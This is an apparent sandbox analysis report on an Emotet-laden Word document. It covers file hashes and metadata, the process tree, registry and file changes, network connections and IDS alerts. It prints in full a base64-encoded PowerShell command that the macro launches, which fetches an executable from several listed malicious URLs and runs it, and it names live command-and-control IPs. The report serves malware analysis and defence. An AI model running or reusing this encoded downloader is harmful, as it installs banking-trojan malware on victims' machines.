File name: | Acuerdo(1).doc |
Full analysis: | https://app.any.run/tasks/b0ee729c-c1d7-404b-b0e6-a86340a530b9 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | February 10, 2019, 20:32:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 2D2B366C0E380D3868C00793B162483F |
SHA1: | 21354EE075A67761AA4499797823B88E0E581F24 |
SHA256: | 9EC427F45A5DA2747138306297B47821E1A76F4BC3C2CD60D0A9045159AEAAE3 |
SSDEEP: | 3072:E3MMsXSi54XEmpDP4NaNJgj+H8AbliNKDzaJFUKc0UTE7yZRUV7RJeOzi8F:ms5WX1jFu88AbAEDzYUTE7yZRVUi8F |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
.xml | | | Generic XML (ASCII) (2.3) |
.html | | | HyperText Markup Language (1.4) |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
---|---|
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
WordDocumentBodySectPRT: | |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://p5LJ9s5jOMXS0iA |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:115.5pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictBinData: | (Binary data 111550 bytes, use -b option to extract) |
WordDocumentBodySectPRPictBinDataName: | wordml://p5LJ9s5jOMXS0iA |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRRsidRPr: | 00D35209 |
WordDocumentBodySectPRsidRDefault: | 0051139A |
WordDocumentBodySectPRsidR: | 0051139A |
WordDocumentDocPrRsidsRsidVal: | 0051139A |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrViewVal: | |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentDocSuppDataBinData: | (Binary data 76216 bytes, use -b option to extract) |
WordDocumentDocSuppDataBinDataName: | zp3oQ67Z |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRsidVal: | 005A24B1 |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 4 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesCharacters: | 4 |
WordDocumentDocumentPropertiesWords: | - |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesLastSaved: | 2019:02:06 19:07:00Z |
WordDocumentDocumentPropertiesCreated: | 2019:02:06 19:07:00Z |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentOcxPresent: | no |
WordDocumentEmbeddedObjPresent: | no |
WordDocumentMacrosPresent: | yes |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2820 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Acuerdo(1).doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 Modules
| |||||||||||||||
4056 | PoWersheLL -e JABEAFkAaQBhAGYAUwBNAD0AKAAnAEgAagAnACsAJwBJACcAKwAnAG4AUgBUAHoAaAAnACkAOwAkAHIAVQBUAFEATgBpAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEIAegBqAHEAcgB6AD0AKAAnAGgAdAB0AHAAOgAnACsAJwAvAC8AbQBpAGEAbQBpAGYAbABvAHIAJwArACcAaQBkAGEAaQBuAHYAZQBzACcAKwAnAHQAaQBnAGEAdAAnACsAJwBvAHIALgBjACcAKwAnAG8AbQAnACsAJwAvADQAOABSADgAbgBjAGMAJwArACcAdwBAAGgAdAB0AHAAOgAvACcAKwAnAC8AeQB1AHMAJwArACcAdQAnACsAJwBmAHMAZQB2AGkAbQAuAGMAbwBtAC8ANAAnACsAJwBhAGoANQBmADYAMwBFAEAAaAB0ACcAKwAnAHQAcAA6AC8AJwArACcALwAnACsAJwBkACcAKwAnAG8AZwAnACsAJwBtAGUAbgBjAHkAYQBwAGkAJwArACcALgBjACcAKwAnAG8AbQAvAGYAegAnACsAJwBtAHQAJwArACcAQwBFAGcAegBAAGgAdAB0ACcAKwAnAHAAOgAvACcAKwAnAC8AbQB5AHYAaQAnACsAJwBkAGkAJwArACcAbwAuAHMAJwArACcAaQB0AGUAJwArACcALwB6AGUAQQB0AHEAbgBLAFEAJwArACcAYgBGAEAAJwArACcAaAB0AHQAcAA6AC8ALwBjAG8AJwArACcAbQBlACcAKwAnAGkAbgBpACcAKwAnAHQAaQAnACsAJwBhACcAKwAnAHQAaQAnACsAJwB2AGUALgBvAHIAZwAnACsAJwAvAGsAJwArACcAcgBoADgAbQB6AEMAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAdQBTAGkATQBEAHcAcgA9ACgAJwBSAHoANgB6AGgAJwArACcASAA1ACcAKwAnAGYAJwApADsAJABLAFgAMgBzADIANwBjACAAPQAgACgAJwAyADAAJwArACcAMAAnACkAOwAkAEUAdAB3AE4AVgBKAE8APQAoACcAYwA2ACcAKwAnAFUANAB3AHYAJwApADsAJABqAFIASgBZADcAUgBMAGkAPQAkAGUAbgB2ADoAdABlAG0AcAArACcAXAAnACsAJABLAFgAMgBzADIANwBjACsAKAAnAC4AZQB4ACcAKwAnAGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQARABpAEQAbwAyAFEATQBxACAAaQBuACAAJABCAHoAagBxAHIAegApAHsAdAByAHkAewAkAHIAVQBUAFEATgBpAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEQAaQBEAG8AMgBRAE0AcQAsACAAJABqAFIASgBZADcAUgBMAGkAKQA7ACQASgBhAG4AegBtAGYASAA9ACgAJwBvAGwAJwArACcAZgAnACsAJwBYAHcAbAAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABqAFIASgBZADcAUgBMAGkAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABqAFIASgBZADcAUgBMAGkAOwAkAGMASwBpAFIAMgA1AGkAPQAoACcASABaAGQAQgAnACsAJwA5AHYAMQAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAbgBOADIAZABOAHEAPQAoACcAVABtAEUAcgB0ACcAKwAnAFUAJwApADsA | C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLL.exe | WINWORD.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3008 | "C:\Users\admin\AppData\Local\Temp\200.exe" | C:\Users\admin\AppData\Local\Temp\200.exe | — | PoWersheLL.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Ressources du compilateur Visual Basic .NET Exit code: 0 Version: 7.00.9951 Modules
| |||||||||||||||
3600 | "C:\Users\admin\AppData\Local\Temp\200.exe" | C:\Users\admin\AppData\Local\Temp\200.exe | 200.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Ressources du compilateur Visual Basic .NET Exit code: 0 Version: 7.00.9951 Modules
| |||||||||||||||
3276 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | 200.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Ressources du compilateur Visual Basic .NET Exit code: 0 Version: 7.00.9951 Modules
| |||||||||||||||
3808 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Ressources du compilateur Visual Basic .NET Version: 7.00.9951 Modules
| |||||||||||||||
2236 | "C:\Program Files\Mozilla Firefox\firefox.exe" | C:\Program Files\Mozilla Firefox\firefox.exe | explorer.exe | ||||||||||||
User: admin Company: Mozilla Corporation Integrity Level: MEDIUM Description: Firefox Version: 61.0.2 Modules
| |||||||||||||||
4032 | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2236.0.551678772\1629403932" -childID 1 -isForBrowser -prefsHandle 1448 -prefsLen 8309 -schedulerPrefs 0001,2 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 2236 "\\.\pipe\gecko-crash-server-pipe.2236" 1496 tab | C:\Program Files\Mozilla Firefox\firefox.exe | firefox.exe | ||||||||||||
User: admin Company: Mozilla Corporation Integrity Level: LOW Description: Firefox Version: 61.0.2 Modules
| |||||||||||||||
2364 | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2236.6.293541264\303440408" -childID 2 -isForBrowser -prefsHandle 2428 -prefsLen 11442 -schedulerPrefs 0001,2 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 2236 "\\.\pipe\gecko-crash-server-pipe.2236" 2472 tab | C:\Program Files\Mozilla Firefox\firefox.exe | firefox.exe | ||||||||||||
User: admin Company: Mozilla Corporation Integrity Level: LOW Description: Firefox Version: 61.0.2 Modules
| |||||||||||||||
2264 | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2236.12.1177280000\1884727266" -childID 3 -isForBrowser -prefsHandle 2964 -prefsLen 11808 -schedulerPrefs 0001,2 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 2236 "\\.\pipe\gecko-crash-server-pipe.2236" 2976 tab | C:\Program Files\Mozilla Firefox\firefox.exe | firefox.exe | ||||||||||||
User: admin Company: Mozilla Corporation Integrity Level: LOW Description: Firefox Version: 61.0.2 Modules
|
(PID) Process: | (2820) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | ~"$ |
Value: 7E222400040B0000010000000000000000000000 | |||
(PID) Process: | (2820) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2820) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2820) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1313472542 | |||
(PID) Process: | (2820) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1313472656 | |||
(PID) Process: | (2820) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1313472657 | |||
(PID) Process: | (2820) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 040B00008A252BD67FC1D40100000000 | |||
(PID) Process: | (2820) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | c$ |
Value: 63242400040B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2820) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | c$ |
Value: 63242400040B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2820) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2820 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9AEE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2820 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE065BE.tmp | — | |
MD5:— | SHA256:— | |||
4056 | PoWersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\46QBQOCOZF9H42O4WCQO.temp | — | |
MD5:— | SHA256:— | |||
2236 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite-shm | — | |
MD5:— | SHA256:— | |||
2236 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json.tmp | — | |
MD5:— | SHA256:— | |||
2236 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs-1.js | — | |
MD5:— | SHA256:— | |||
2236 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm | — | |
MD5:— | SHA256:— | |||
4056 | PoWersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2820 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:4EBE9CB13A95AA4D33E0FE969D68D4BC | SHA256:21A9D2698F8FE76EB91678C355B24A49377714715A948C38D46DA16AF0C70466 | |||
2236 | firefox.exe | C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\safebrowsing-updating\block-flash-digest256.sbstore | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3808 | wabmetagen.exe | GET | — | 174.84.250.37:443 | http://174.84.250.37:443/ | US | — | — | malicious |
2236 | firefox.exe | GET | — | 174.84.250.37:80 | http://174.84.250.37/ | US | — | — | malicious |
4056 | PoWersheLL.exe | GET | 301 | 184.106.55.126:80 | http://miamifloridainvestigator.com/48R8nccw | US | html | 335 b | malicious |
2236 | firefox.exe | POST | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/ | US | der | 471 b | whitelisted |
2236 | firefox.exe | GET | — | 174.84.250.37:80 | http://174.84.250.37/ | US | — | — | malicious |
4056 | PoWersheLL.exe | GET | 200 | 184.106.55.126:80 | http://miamifloridainvestigator.com/48R8nccw/ | US | executable | 264 Kb | malicious |
2236 | firefox.exe | POST | 200 | 172.217.16.131:80 | http://ocsp.pki.goog/GTSGIAG3 | US | der | 463 b | whitelisted |
2236 | firefox.exe | POST | 200 | 172.217.16.131:80 | http://ocsp.pki.goog/GTSGIAG3 | US | der | 463 b | whitelisted |
2236 | firefox.exe | POST | 200 | 172.217.16.131:80 | http://ocsp.pki.goog/GTSGIAG3 | US | der | 463 b | whitelisted |
2236 | firefox.exe | POST | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/ | US | der | 471 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2236 | firefox.exe | 2.16.186.50:80 | detectportal.firefox.com | Akamai International B.V. | — | whitelisted |
4056 | PoWersheLL.exe | 184.106.55.126:80 | miamifloridainvestigator.com | Liquid Web, L.L.C | US | malicious |
3808 | wabmetagen.exe | 187.131.137.216:50000 | — | Uninet S.A. de C.V. | MX | malicious |
3808 | wabmetagen.exe | 174.84.250.37:443 | — | — | US | malicious |
2236 | firefox.exe | 52.27.184.151:443 | search.services.mozilla.com | Amazon.com, Inc. | US | unknown |
2236 | firefox.exe | 143.204.8.62:443 | snippets.cdn.mozilla.net | — | US | unknown |
2236 | firefox.exe | 52.18.148.152:443 | location.services.mozilla.com | Amazon.com, Inc. | IE | unknown |
2236 | firefox.exe | 172.217.16.131:80 | ocsp.pki.goog | Google Inc. | US | whitelisted |
2236 | firefox.exe | 216.58.207.74:443 | safebrowsing.googleapis.com | Google Inc. | US | whitelisted |
2236 | firefox.exe | 34.208.103.195:443 | tiles.services.mozilla.com | Amazon.com, Inc. | US | unknown |
Domain | IP | Reputation |
---|---|---|
miamifloridainvestigator.com |
| unknown |
detectportal.firefox.com |
| whitelisted |
a1089.dscd.akamai.net |
| whitelisted |
search.services.mozilla.com |
| whitelisted |
search.r53-2.services.mozilla.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
cs9.wac.phicdn.net |
| whitelisted |
tiles.services.mozilla.com |
| whitelisted |
tiles.r53-2.services.mozilla.com |
| whitelisted |
snippets.cdn.mozilla.net |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
4056 | PoWersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4056 | PoWersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
4056 | PoWersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3808 | wabmetagen.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3808 | wabmetagen.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |